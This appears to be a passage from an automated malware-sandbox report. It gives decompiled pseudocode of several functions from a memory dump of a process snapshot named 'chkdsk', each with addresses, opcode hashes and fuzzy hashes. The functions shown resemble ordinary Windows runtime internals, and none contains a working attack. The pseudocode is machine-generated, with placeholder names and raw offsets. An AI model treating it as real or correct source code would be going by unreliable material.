							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L04DA4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                      0x04dc3d4c
                                                      0x04dc3d50
                                                      0x04dc3d55
                                                      0x04dc3d5e
                                                      0x04dfe79a
                                                      0x00000000
                                                      0x04dfe79a
                                                      0x04dc3d68
                                                      0x04dfe789
                                                      0x04dc3d9d
                                                      0x04dc3da3
                                                      0x04dc3daf
                                                      0x04dc3db5
                                                      0x04dc3dbc
                                                      0x04dc3dc4
                                                      0x04dc3dc9
                                                      0x04dc3dce
                                                      0x04dfe7ae
                                                      0x04dfe7ae
                                                      0x04dc3dde
                                                      0x04dc3de2
                                                      0x04dc3de7
                                                      0x04dc3e0d
                                                      0x04dc3e13
                                                      0x04dc3e16
                                                      0x04dc3e1e
                                                      0x04dc3e25
                                                      0x04dc3e28
                                                      0x00000000
                                                      0x00000000
                                                      0x04dc3e2a
                                                      0x04dc3e2f
                                                      0x04dc3e37
                                                      0x04dc3e37
                                                      0x00000000
                                                      0x04dc3e37
                                                      0x04dc3e31
                                                      0x00000000
                                                      0x04dc3e31
                                                      0x04dc3e20
                                                      0x04dc3e20
                                                      0x04dc3e35
                                                      0x00000000
                                                      0x04dc3de9
                                                      0x04dc3de9
                                                      0x04dc3de9
                                                      0x04dc3dee
                                                      0x04dc3dfd
                                                      0x04dc3dff
                                                      0x04dc3e02
                                                      0x04dc3e05
                                                      0x04dc3e05
                                                      0x00000000
                                                      0x04dc3df0
                                                      0x04dc3de7
                                                      0x04dfe78f
                                                      0x04dfe794
                                                      0x04dc3d79
                                                      0x04dc3d84
                                                      0x04dc3d89
                                                      0x04dc3d8e
                                                      0x00000000
                                                      0x04dfe7a4
                                                      0x04dc3d96
                                                      0x04dc3d9a
                                                      0x00000000
                                                      0x04dc3d9a
                                                      0x00000000
                                                      0x04dfe794
                                                      0x04dc3d6e
                                                      0x04dc3d73
                                                      0x00000000
                                                      0x04dfe7b5
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f95b6f798f440893f1cbcdc33f8f73cac4d6d87b6df01e563e957410508a9c95
                                                      • Instruction ID: b49ff1178a6946b87254a61426d9d20c1134d70b84c152649e5f849f814e45df
                                                      • Opcode Fuzzy Hash: f95b6f798f440893f1cbcdc33f8f73cac4d6d87b6df01e563e957410508a9c95
                                                      • Instruction Fuzzy Hash: 9C318F31705616DBD7298F2AC841A7ABBE5FF55710705C06EE886CB360F734E841DB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DBA61C Relevance: .1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E04DBA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x4e60220);
				E04DDD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x4e77b9c; // 0x0
				_t55 = L04DA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E04DDD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x4e77b10 =  *0x4e77b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x4e7536c; // 0x3004a0
					if( *_t51 != 0x4e75368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x4e75368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x4e7536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E04DBA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                      0x04dba61c
                                                      0x04dba61e
                                                      0x04dba623
                                                      0x04dba628
                                                      0x04dba62b
                                                      0x04dba62d
                                                      0x04dba648
                                                      0x04dba64a
                                                      0x04dba64f
                                                      0x04df9b44
                                                      0x04dba6ec
                                                      0x04dba6f1
                                                      0x04dba6f1
                                                      0x04dba655
                                                      0x04dba657
                                                      0x04dba65a
                                                      0x04dba65d
                                                      0x04dba662
                                                      0x04dba663
                                                      0x04dba667
                                                      0x04dba668
                                                      0x04dba66d
                                                      0x04dba706
                                                      0x04dba706
                                                      0x04df9bda
                                                      0x04df9be6
                                                      0x04df9beb
                                                      0x00000000
                                                      0x04df9beb
                                                      0x04dba679
                                                      0x04df9b7a
                                                      0x00000000
                                                      0x04df9b7a
                                                      0x04dba683
                                                      0x04dba6f4
                                                      0x04dba6f7
                                                      0x04dba6f9
                                                      0x04dba6fd
                                                      0x04dba6a0
                                                      0x04dba6a0
                                                      0x04dba6ad
                                                      0x04dba6af
                                                      0x04dba6b4
                                                      0x04df9ba7
                                                      0x04df9bac
                                                      0x00000000
                                                      0x00000000
                                                      0x04df9bc6
                                                      0x04df9bce
                                                      0x04df9bd1
                                                      0x04df9bd3
                                                      0x04df9bd3
                                                      0x00000000
                                                      0x04df9bd1
                                                      0x04dba6bd
                                                      0x04dba6c3
                                                      0x04dba6c6
                                                      0x04dba6d2
                                                      0x04dba701
                                                      0x04dba704
                                                      0x00000000
                                                      0x04dba704
                                                      0x04dba6d4
                                                      0x04dba6d6
                                                      0x04dba6d9
                                                      0x04dba6db
                                                      0x04dba6e1
                                                      0x04dba6e6
                                                      0x04dba6e8
                                                      0x04dba6e8
                                                      0x04dba6ea
                                                      0x00000000
                                                      0x04dba6ea
                                                      0x04dba688
                                                      0x04dba692
                                                      0x04dba694
                                                      0x04dba699
                                                      0x00000000
                                                      0x00000000
                                                      0x04dba69d
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3a0478de16fa2a77ba03eae1217c620e60717946fdcd9b808b0bafc396c11d63
                                                      • Instruction ID: 9bf6aab73e9f0eaebc8f35ec9ed7f9d1ada677b114aed789611c69b5526a6d81
                                                      • Opcode Fuzzy Hash: 3a0478de16fa2a77ba03eae1217c620e60717946fdcd9b808b0bafc396c11d63
                                                      • Instruction Fuzzy Hash: B34149B5A10215DFDB25CF58C890BA9BBF2FB49314F1580AAE945AB344D774BD01CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E07016 Relevance: .1, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E04E07016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x4e7d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E04E06B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E04E06B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E04DA7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E04DC9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E04DCB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L04DA4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                      0x04e07016
                                                      0x04e0701e
                                                      0x04e0702b
                                                      0x04e07033
                                                      0x04e07037
                                                      0x04e0703c
                                                      0x04e0703e
                                                      0x04e07041
                                                      0x04e07045
                                                      0x04e0704a
                                                      0x04e07050
                                                      0x04e07055
                                                      0x04e0705a
                                                      0x04e07062
                                                      0x04e07062
                                                      0x04e0705a
                                                      0x04e07064
                                                      0x04e07064
                                                      0x04e07067
                                                      0x04e07071
                                                      0x04e07096
                                                      0x04e0709b
                                                      0x04e070a2
                                                      0x04e070a6
                                                      0x04e070a7
                                                      0x04e070ad
                                                      0x04e070b3
                                                      0x04e070b6
                                                      0x04e070bb
                                                      0x04e070c3
                                                      0x04e070c3
                                                      0x04e070c6
                                                      0x04e070cd
                                                      0x04e070dd
                                                      0x04e070e0
                                                      0x04e070e2
                                                      0x04e070e2
                                                      0x04e070ee
                                                      0x04e07101
                                                      0x04e070f0
                                                      0x04e070f9
                                                      0x04e070f9
                                                      0x04e0710a
                                                      0x04e0710e
                                                      0x04e07112
                                                      0x04e07117
                                                      0x04e07118
                                                      0x04e07118
                                                      0x04e070bb
                                                      0x04e0711d
                                                      0x04e07123
                                                      0x04e07131
                                                      0x04e07131
                                                      0x04e07136
                                                      0x04e0713d
                                                      0x04e0713e
                                                      0x04e0713f
                                                      0x04e0714a
                                                      0x04e0714a
                                                      0x04e07084
                                                      0x04e07088
                                                      0x00000000
                                                      0x04e0708e
                                                      0x04e0708e
                                                      0x04e07092
                                                      0x00000000
                                                      0x04e07092

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 757509e50ea496f7f0b58964677bd1aa3fd6451e64b7fabb4c404cc30f592dc4
                                                      • Instruction ID: 4a31ff6a3d966eba74789722c34cca07cb06db729fccaad49277356d8bf9143c
                                                      • Opcode Fuzzy Hash: 757509e50ea496f7f0b58964677bd1aa3fd6451e64b7fabb4c404cc30f592dc4
                                                      • Instruction Fuzzy Hash: A331A4726047919BC320DF68C940A6AB7E9FF88704F048A2DF8A5976D0E770F954CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DAC182 Relevance: .1, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 68%
                                                      			E04DAC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E04DA7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E04E58D34(_v8, _t80);
					}
					E04DA2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E04D9FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E04E58833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E04D9FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E04DCB180();
						if(_a4 != 0) {
							E04DA2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E04DABB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E04DABB2D(_t16, _t15);
						E04DAB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E04D9FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E04D9FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E04D9FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                      0x04dac18d
                                                      0x04dac18f
                                                      0x04dac191
                                                      0x04dac19b
                                                      0x04dac1a0
                                                      0x04dac1d4
                                                      0x04dac1de
                                                      0x04df2d6e
                                                      0x04dac1e4
                                                      0x04dac1e4
                                                      0x04dac1e4
                                                      0x04dac1ec
                                                      0x04df2d7d
                                                      0x04df2d7d
                                                      0x04dac1f3
                                                      0x04dac1ff
                                                      0x04df2d88
                                                      0x04df2d8d
                                                      0x04df2d94
                                                      0x04df2d94
                                                      0x04df2d9f
                                                      0x04df2da4
                                                      0x04df2dab
                                                      0x04df2db0
                                                      0x04df2db2
                                                      0x04df2db3
                                                      0x04df2db4
                                                      0x04df2dbc
                                                      0x04df2dc3
                                                      0x04df2dc3
                                                      0x04dac205
                                                      0x04dac205
                                                      0x04dac208
                                                      0x04dac20e
                                                      0x04dac211
                                                      0x04dac216
                                                      0x04dac219
                                                      0x04dac21f
                                                      0x04dac222
                                                      0x04dac22c
                                                      0x04dac234
                                                      0x04dac23a
                                                      0x04dac23f
                                                      0x04dac245
                                                      0x04dac24b
                                                      0x04dac251
                                                      0x04dac25a
                                                      0x04dac276
                                                      0x04dac27d
                                                      0x04dac27d
                                                      0x04dac25c
                                                      0x04dac25c
                                                      0x00000000
                                                      0x04dac25e
                                                      0x04dac1a4
                                                      0x04dac1aa
                                                      0x04dac1b3
                                                      0x04dac265
                                                      0x04dac26c
                                                      0x04dac26c
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                      • Instruction ID: 63cbdc01dad62276913bf7d6570cd5da3bf8f92f765854b919c5e613a1bcba97
                                                      • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                      • Instruction Fuzzy Hash: 72310672B0154AAEEB04EFB5C880BE9F794FF42218F04415AD51C87241DB39BA6AD7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DBA70E Relevance: .1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E04DBA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x4e77b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x4e77b10 = 8;
					 *0x4e77b14 = 0x4e77b0c;
					 *0x4e77b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E04DBA990(0x4e77b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L04DBA840(__edx, __ecx, __ecx, _t52, 0x4e77b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x4e77b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x4e77b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x4e77b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L04DA4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x4e77b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E04DCF3E0(_t50,  *0x4e77b14, _t8 >> 3);
						_t28 =  *0x4e77b14; // 0x776f7b0c
						__eflags = _t28 - 0x4e77b0c;
						if(_t28 != 0x4e77b0c) {
							L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x4e77b14 = _t50;
						_t48 = _v12;
						 *0x4e77b10 = _t9;
						goto L6;
					}
					 *0x4e77b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                      0x04dba713
                                                      0x04dba714
                                                      0x04dba717
                                                      0x04dba71d
                                                      0x04dba720
                                                      0x04dba722
                                                      0x04dba727
                                                      0x04dba74a
                                                      0x04dba754
                                                      0x04dba75e
                                                      0x04dba768
                                                      0x04dba76a
                                                      0x04dba773
                                                      0x04dba78b
                                                      0x04dba790
                                                      0x04dba792
                                                      0x04dba741
                                                      0x04dba741
                                                      0x04dba743
                                                      0x04dba749
                                                      0x04dba749
                                                      0x04dba732
                                                      0x04dba73a
                                                      0x04dba797
                                                      0x04dba79d
                                                      0x04dba7a3
                                                      0x04dba7a9
                                                      0x04dba7b6
                                                      0x04dba7bc
                                                      0x04dba7ca
                                                      0x04dba7e0
                                                      0x04dba7e2
                                                      0x04dba7e4
                                                      0x04df9bf2
                                                      0x00000000
                                                      0x04df9bf2
                                                      0x04dba7ed
                                                      0x04dba7f2
                                                      0x04dba800
                                                      0x04dba805
                                                      0x04dba80d
                                                      0x04dba812
                                                      0x04df9c08
                                                      0x04df9c08
                                                      0x04dba818
                                                      0x04dba81b
                                                      0x04dba821
                                                      0x04dba824
                                                      0x00000000
                                                      0x04dba824
                                                      0x04dba7ae
                                                      0x00000000
                                                      0x04dba7ae
                                                      0x04dba73c
                                                      0x04dba73e
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0c48b093bcaf52d70b6167be28e4e007e13e12e6c546266db06fd82a0f18a3c0
                                                      • Instruction ID: 995ba77dbf90e80f6d67fd7d11ecb9db2020dc268479bab5fe5b85c2addc6c2b
                                                      • Opcode Fuzzy Hash: 0c48b093bcaf52d70b6167be28e4e007e13e12e6c546266db06fd82a0f18a3c0
                                                      • Instruction Fuzzy Hash: FD31ACB1704201EBD711CB19E880FA977FAFB84721F14099AE48687344E778BD01CBE2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DB61A0 Relevance: .1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 97%
                                                      			E04DB61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E04DB5E50(0x4d667cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E04E59D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E04D8F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                      0x04db61b3
                                                      0x04db61b5
                                                      0x04db61bd
                                                      0x04db61c3
                                                      0x04db61c7
                                                      0x04db61d2
                                                      0x04db61ff
                                                      0x04db61ff
                                                      0x04db6201
                                                      0x04db6207
                                                      0x04db6207
                                                      0x04db61d4
                                                      0x04db61d9
                                                      0x00000000
                                                      0x00000000
                                                      0x04db61df
                                                      0x04db61e2
                                                      0x00000000
                                                      0x00000000
                                                      0x04db61e6
                                                      0x04db61e8
                                                      0x04db61ee
                                                      0x04db61ee
                                                      0x04db61f9
                                                      0x04df762f
                                                      0x04df7632
                                                      0x04df7635
                                                      0x04df7639
                                                      0x04df7640
                                                      0x04df766e
                                                      0x04df7675
                                                      0x00000000
                                                      0x00000000
                                                      0x04df7681
                                                      0x04df7689
                                                      0x04df768d
                                                      0x04df7691
                                                      0x04df7695
                                                      0x04df7699
                                                      0x04df76af
                                                      0x04df76b5
                                                      0x04df76b7
                                                      0x04df76b7
                                                      0x04df76d7
                                                      0x04df76dc
                                                      0x00000000
                                                      0x04df76dc
                                                      0x04df76a2
                                                      0x04df76a9
                                                      0x04df7651
                                                      0x04df7653
                                                      0x04df7653
                                                      0x04df7656
                                                      0x04df7656
                                                      0x00000000
                                                      0x04df7656
                                                      0x04df7644
                                                      0x04df7646
                                                      0x04df7648
                                                      0x04df7648
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Memory Dump Source
